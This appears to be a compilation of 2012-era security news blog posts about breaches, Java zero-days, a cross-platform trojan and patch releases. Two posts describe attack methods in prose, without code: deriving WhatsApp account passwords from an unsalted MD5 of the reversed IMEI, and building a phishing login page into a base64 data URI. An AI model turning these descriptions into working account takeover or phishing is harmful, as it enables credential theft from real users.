WhatsApp Uses a Potentially Insecure Authentication Mechanism

WhatsApp has been criticized earlier for lax security on multiple occasions. In May last year, WhatsApp accounts could be hijacked without the user knowing, and another time in January this year, the status of a WhatsApp user could be changed remotely. Both these vulnerabilities were fixed soon. However, a concern that lived on was that WhatsApp sends communications in plaintext. This vulnerability was found in May 2011 and it was not fixed until May this year. However, the most insecure vulnerability on WhatsApp is simply in its authentication mechanism.


The Wikipedia page for WhatsApp outlines its Technical Specifics as,

WhatsApp uses a customized version of the open standard Extensible Messaging and Presence Protocol (XMPP).Upon installation, it creates a user account using one’s phone number as username (Jabber ID: [phone number]@s.whatsapp.net) and an MD5-hashed, reversed-version of the phone’s IMEI as password.

An interesting analysis by Sam Granger points out how easy it is to leverage this information, and actually get access to a user account. Who would have thought that WhatsApp uses exactly the same mechanism as written on the Wikipedia page, no salting of the hash, no obfuscated MD5 variant; in short, no deviations from what is written down!

WhatsApp has to get its security straight. It is under constant criticism for over a year now, and it is time WhatsApp is the first to make a security related move, rather than someone pointing out flaws and it going ahead and patching them.

For an intriguing discussion on this topic, read this Hacker News thread.

Al-Jazeera Hacked by Syrian Hacker Group Al-Rashedon

Al-Rashedon, a Syrian hacker group has hacked a slew of Al-Jaeera websites for their reporting of the unrest in Syria. The hack affected Al-Jazeera’s English and Arabic websites, and left them defaced with this image on Tuesday.


The group posted a message to Al-Jazeera as seen in the image, saying,

In response to your stand against Syria (Government and the People) And your support to terrorist groups in addition to spreading lies and made up news.. We have hacked your website and this is our retaliation.

The Syrian hacker group accuses Al-Jazeera of spreading fabricated news and supporting armed terrorist groups. Although Syria has another known hacker group called the Syrian Electronic Army, there was no word from them on this hack. Al-Jazeera has not commented on the hack officially either.

Qatar based Al-Jazeera takes a lot of heat from dictatorial governments like Egypt, Syria and the Saudi kingdom for its aggressive coverage of the instability in the region. Al-Jazeera also saw an exodus of journalists over biased reporting of the situation in Syria. A few months ago, the official Twitter account of Al-Jazeera was hacked by Assad loyalists. The political scenario in the Middle East is quite tense and disturbing, and perhaps, Al Jazeera is being dominated by the Government to reflect its own foreign policy. However, this is a clear indication of what can happen in a modern day political war, where everything is driven by computer technology and is equally vulnerable.

Over a Million Apple Device UDIDs Leaked by Hackers as Part of AntiSec

Back in August this year, NSA general Keith Alexander addressed the DefCon crowd for the first time and called upon hackers to join the NSA and strengthen the cyber-security infrastructure of America. However, on being asked whether the government keeps profiles of Americans and spies on them, he went into the usual denial mode. However, William Binney, a former Technical Director at the NSA (also present at DefCon) assured that this spying was indeed happening and that is the reason he left NSA back in 2001.


Now, hacker groups have gotten hold of clear proof that the FBI is spying on people. They have released a huge announcement, as part of the #AntiSec movement, and the FBI is trumped. This Pastebin announcement has a long rant and a list of doxes that were obtained from the FBI laptop.

During the second week of March 2012, a Dell Vostro notebook, used by Supervisor Special Agent Christopher K. Stangl from FBI Regional Cyber Action Team and New York FBI Office Evidence Response Team was breached using the AtomicReferenceArray vulnerability on Java, during the shell session some files were downloaded from his Desktop folder one of them with the name of “NCFTA_iOS_devices_intel.csv” turned to be a list of 12,367,232 Apple iOS  devices including Unique Device Identifiers (UDID), user names, name of device,  type of device, Apple Push Notification Service tokens, zipcodes, cellphone numbers, addresses, etc. the personal details fields referring to people appears many times empty leaving the whole list incompleted on many parts. no other file on the same folder makes mention about this list or its purpose.

The hack is so popular; it has become the most visited Pastebin paste ever, within 24 hours. However, it also raises questions. What is the FBI doing with 12 million Apple UDIDs? Why is the data lying on a laptop, unencrypted? There are too many unanswered questions here. Apple and the FBI should come out with a response.

Update: The FBI denied possessing any such file.

Phishing 2.0; Phishing Without Fake Webpages

Nowadays everyone will be familiar with phishing attacks. It is basically the process of obtaining confidential information from a person by communicating with the victim (using emails, phone calls etc.) posing as someone else. The typical phishing attack includes creating a fake login page, storing them in a server and emailing the victim with the fake login page link. Now a new research paper from InfoSec student, Henning Klevjer shows how a hacker can create phishing attacks without the need for storing the fake login page on a server.

This method uses URI or universal resource identifier which is basically a string of characters that are used to identify a name or a resource. Using URI, the required data (the code for login page in this case) is stored within the URI with the following scheme


Here <data> will contain the fake login page. The procedure for creating a phishing URI starts with creating a login page using the code from the original page.  The original code is modified accordingly so that the entered data such as password are sent to a location as desired  by the hacker. This page is then encoded using a scheme called Base64. Base64 is a method of encoding binary data to ASCII format which will increase the data size by around 33%. The next and the final step is to append this information to the URI.

The final URI will be extremely long and suspicious looking one. But as all browsers support legacy URI schemes, it will be rendered properly, as long as it doesn’t extend more than the maximum URL limit allowed by the browser.

Although, the large URI can be masked using a URL shortening service, Henning states that this method has some major limitations thanks to implementation of data URIs in Chrome and Internet Explorer.

You can read more about this method here(PDF).

Via: Naked Security

Another day, Another Java Vulnerability Discovered!

So you have read about the recent vulnerabilities discovered in Java that attackers used to spread malware? Have you installed the latest out-of-band update that Oracle released in order to close those vulnerabilities? Think it’s time to move on to other stories? Well, think again.

Computer World is reporting that another serious vulnerability in the latest update has been discovered that could allow an attacker to escape the Java security sandbox and run arbitrary code on your system. The vulnerability was discovered by a Polish security firm called Security Explorations and has been reported to Oracle, according to their CEO, Adam Gowdiak. He has also stated that they will not be releasing any technical details on the vulnerability until Oracle issues a fix.

In an email to IDG News Service, he states,

“Once we found that our complete Java sandbox bypass codes stopped working after the update was applied, we looked again at POC codes and started to think about the possible ways of how to fully break the latest Java update again,” Gowdiak said. “A new idea came, it was verified and it turned out that this was it.”

Oracle hasn’t hinted whether they will be releasing an out-of-band update like the previous one or just include the patch in the scheduled October update. With vulnerabilities being discovered at such a fast pace, it might be time for Oracle to re-consider their four month update cycle. With the time span for fixing these vulnerabilities increasing, the chances of these vulnerabilities being used to attack users also increase leaving users with greater risk.

At this moment, the best option for you is to disable Java if you don’t really use it. Alternately, you can disable Java in your primary browser and use a secondary browser only to use web apps that require Java (if you absolutely need to use those web apps and are sure that those are not rogue) so that you don’t wander into compromised websites that make use of Java vulnerabilities.

First Cross Platform Trojan Affecting Linux and Mac OS X Revealed

Russian security firm Dr.Web has identified a new Trojan named BackDoor.Wirenet.1 which runs on both Linux as well as Mac OS X. This is the first ever cross platform Trojan that has been discovered to affect both of the aforementioned operating systems.

At the moment, a lot of information is not available on this malware. But the research is going on and it is said to steal passwords from all of the popular browsers such as Safari, Chrome, Opera and Chromium. It also steals passwords from applications such as Thunderbird, SeaMonkey and Pidgin.

According to Dr.Web, when executed, the Trojan copies itself to the user’s home directory – that is % home%/WIFIADAPT.app.app in MAC OS X and ~/WIFIADAPT in Linux.

Cross platform Trojans are not rare. Trojans that affect Windows and Macs have been identified in the past. A recently discovered Trojan used to check which Operating System the affected user was running and downloaded the payload accordingly. Another one was discovered in May that used unpatched Java vulnerability to open backdoors in Windows and Mac. But as I mentioned before, this is the first time that a cross platform Trojan affecting Mac and Linux has been discovered.  We will be updating this article as more details are released.

Via : Hacker News

Critical Zero Day Java Vulnerability Wreaking Havoc

Critical zero-day vulnerability in Java has caused worldwide panic and unrest. The flaw is being exploited wildly, and there is an array of available code for this exploit. Metasploit was the first one to provide a proof-of-concept that works on a variety of browsers. The vulnerability is still unpatched, and although there are no reported criminal cases yet, there is no guarantee that it is not happening already. The safest way to go is to disable the Java plugin in your browser until Oracle releases a fix for the vulnerability.

JavaThis security hole affects all Java versions under the 7.X branch. It works across all browsers, including the touted as unbreakable and secure Google Chrome. Apparently, Google Chrome’s sandbox runs only Adobe Flash as sandboxed by default. The Java plugin is not part of the Chrome sandbox. Java is platform independent, and this exploit rides on this factor spreading to all popular platforms (Windows, Linux and Mac) with little effort. Though the most dangerous fact is that the vulnerability lets malicious code disable the Java Security Manager altogether.

The exploit has been successful in installing a variant of the Poison Ivy trojan. It is originating from servers in China and Oracle has not yet released any statement on fixing this exploit. The NakedSecurity blog at Sophos writes,

In his conversation with the Blackhole author Krebs was told that exploits like this could go for $100,000 on the black market. That shows how effective attacks using this type of vulnerability can be.

Security experts are working on an unofficial patch for this vulnerability, as Oracle has the next scheduled Java update on 16 October.


Information Security: Are we Evolving Fast Enough?

In the last two decades, we have seen a lot of changes around us. We have moved from standard definition to high definition content, dial-up internet to high speed broadband communication and our mode of interaction with devices are also changing with touch and voice input becoming more common. We have also changed our way of communicating and storing data. A lot of our data is stored online in the cloud and most of the communication is online through Twitter, Facebook etc.

Along with the aforementioned changes, our security policies are also changing. With us trusting more and more of our data with technology companies, it is vital for us to ruminate about their security procedures. In the early nineties, the security policies were framed based on the core principles known as CIA – confidentiality, integrity and availability. But times have changed and so have the bad guys. We can no longer rely on the old principles alone. Our security policies have to evolve and that too fast. But are we moving fast enough? Let’s take a look.

Just a few weeks ago, WIRED editor, Mat Honan’s iCloud account was compromised along with his Amazon account. Using the hacked iCloud account, the hacker remotely wiped data from his iPhone, iPad and MacBook. How was the hacker able to do it? Shockingly, just by calling Apple customer support! The hacker was able to get all of the information required to take control of an account from the internet and Amazon using social engineering. You can read the entire story here.

This is just one example. You can find a number of incidents like this. Interestingly, most of today’s attacks use social engineering as the preferred method. But have the technology sectorw evolved enough to protect themselves and customers from these type of attacks? The truth is, while certain companies are trying their best, most or a lot of companies do not think outside the box. In a SANS white paper titled “A Multi-Level Defense Against Social Engineering”, David Gragg quotes Keith A. Rhodes, chief technologist at the U.S. General Accounting Office as follows.

He notes, “Very few companies are worried about this. Every one of them should be.”

Considering that a large number of attacks in 2011 were using social engineering, we can easily conclude that his words are very much true. Still, the unfortunate truth is that companies are not training its staff on detecting social engineering tactics. For example, a large number of tech companies rely on personal information to reset password. At the current age of social network, that information is fairly easy to obtain as shown by the Mat Honan incident. By not taking our current technological ecosystem into consideration, these companies are effectively creating a loophole that the hackers can make use of.

But every time a data breach occurs, can we blame the company or the client? Ted Claypoole, author of ‘Protecting Your Internet Identity: Are You Naked Online?’ says that at certain levels, preventing hacking is just impossible.

“Everyone is hacked.  Sometimes a company has a big loss, and other times smaller losses. But professional criminals are testing weaknesses all the time, technology changes constantly, and all businesses have been a victim, or will be a victim. Some never know it.

There is no such thing as impenetrable security.  For a thing to have value, you must be able to use it.  And if you can reach it to use it, then so can a bad guy.  Sometimes they impersonate the account holder.  Sometimes they take jobs inside the company and become the security flaw.  Sometimes they exploit the technology.  But every company has “insufficient security policies” by your measure, because every company is vulnerable. Anyone who tells you that their major company has never been breached is either lying, naïve or both.

Last year a hacker, probably foreign government sponsored, broke into RSA, one of our very top security companies, and took information that could allow the hackers to hack defense contractors (like Lockheed Martin).

Our financial protection from harm lies not in company security policies, but in the system itself.  This is why we have a $50 fraud limit on our credit cards, and why, when someone breaks in to steal up to $100,0000 of your money from the bank, they did not just steal your money – they either stole the bank’s money or the government’s money, and yours will be returned.  The system eats billions in fraud each year and we all pay a little bit for it, so that the losses are not as unevenly distributed if it happens to you. So I question your assumption that companies who are hacked have insufficient security policies.  Resources are limited. We can all spend only so much time and money on security.  Sometimes you can have the top security in the world, and the bad guys are simply better.”

And that is certainly true. At times, the bad guys are just too good for us to prevent an incident. But that shouldn’t deter us from creating strong security policies and training our staff to prevent incidents such as the one that happened to Mat. The truth is that most of the time, the data breach would have been completely avoidable (96% of breaches in 2011 were avoidable according to Verizon Business Data Breach Investigations Report, 2011). For example, Microsoft India’s online store was hacked last year and password and credit card data was stolen. Apparently, the company that managed the store on behalf of Microsoft didn’t even bother to encrypt the passwords making the hacker’s job a walk in the park.

So what can we do to improve our current security infrastructure? What we need is a holistic approach in dealing with creation of new security policies considering the latest trends and method of attacks.  The policies should evolve fast enough as the attack vectors evolve. Now this is not an easy thing to do but it has to be done in order to safeguard our data. We could have an internationally valid security certification process similar to the ISO  270001 certification which analyses the security policies and practices of a company and rates the company on behalf of their policies. This will help customers in selecting the best in terms of security and will give the companies a necessary ‘push’ in framing the right policies.

Furthermore, the government can pass laws that prioritize the safeguard of consumer data. Unfortunately, there is no solid law in the US that focuses on protection of consumer data, says Ted. “Lawmakers in the United States are doing very little to force protection of user’s data. Other industrialized nations believe that data privacy and data security is a human right that their citizen’s hold.  This country does not yet acknowledge any such right.  We have laws protecting certain specific classes of information in certain circumstances – some health care data, financial data, and children’s information – but our data protection laws are confused and disjointed.”

While Senators are trying to pass laws such as SOPA for the benefit of the entertainment industry, it would be nice if they could spend a little bit of their valuable time in making solid laws to protect our data and as well as our identity online. Only effective security policies along with strong laws can bring about durable changes in the security infrastructure so that we can sleep tight without worrying about our data.

Patch Tuesday: Microsoft and Adobe Releases Critical Patches

It’s that day of the month when you have to fire up Windows Update and install all of those very precious security updates. Both Microsoft and Adobe has released a number of updates which are available for download right now.

The new updates consists of nine bulletins, out of which five updates are rated critical, the highest severity rating. Rest of the updates are rated important by Microsoft. These updates fix 26 vulnerabilities in Microsoft Windows, Internet Explorer, Exchange Server, SQL Server, Server Software, Developer Tools, and Office. You can either use Windows Update or download the updates from Download Center. If you have automatic updates enabled (as you should), you will probably have these installed already.

Adobe on the other hand has released three security bulletins for Reader, Acrobat, Shockwave and Flash. The updates for Adobe and Acrobat fix about 20 vulnerabilities for both Windows and Mac OS X versions of their software. The Flash Player update, which is touted as the most important among the updates, fixes vulnerability (CVE-2012-1535) which according to Adobe has been used in the wild in a limited manner. The update for Shockwave Player addresses five memory corruption vulnerabilities that could lead to code execution.

For more information on the updates from Microsoft, visit MSRC . To download updates for Adobe products, visit their security bulletins and advisories section.

Make sure to have these updates installed on your PC as soon as possible, for better protection from online threats.

Bitcoinica Sued for $460,457.70 over Lost Bitcoins Due to Lax Security

Bitcoin grew to be extremely popular over the last year, though the value of a Bitcoin fell from a whopping $15 to $3. Although it seems to have stabilized at $9 after a recent rise, the Bitcoin ecosystem is not free of troubles yet. Recently, the flagship Bitcoin trading platform, Bitcoinica has attracted a lot of hackers, and there have been two major security breaches at Bitcoinica.


Bitcoinica started as a one-man show by Zhou Tong, and soon thereafter, he put together a team to manage this prospective business. However, the Bitcoinica platform has been upset by hack attempts, and the response from the people at Bitcoinica is not very promising either. In a disturbing statement made in May, Bitcoinica admits to have ignored user security, saying,

The recent security breach was not beyond our team’s skills to prevent. We know better. But we did not address relevant issues as quickly as was needed.

Now, the users of the Bitcoinica platform are suing Bitcoinica for $460,457.70 over lost Bitcoins. This includes the price of lost Bitcoins and other damages. Bitcoinica lost Bitcoins worth $87,000 in the first hack (43,554 Bitcoins), and $90,000 (18,547 Bitcoins) in the second hack.

The charge does not come out of the blue, as Bitcoinica promised to cover the losses of its users on two instances, once by promising to pay the entire Bitcoins lost due to hacking, and another time by promising to pay 50% of the lost Bitcoins. However, it has failed to live up to its promises on both instances, and the discontent towards Bitcoinica does not end here. The plaintiffs have also accused Bitcoinica of following corrupt processes.

For a currency system that emerged with a global outlook and a dream of government-intervention-free trading, the Bitcoin ecosystem just fell flat on its face with hack attacks and this recent court case.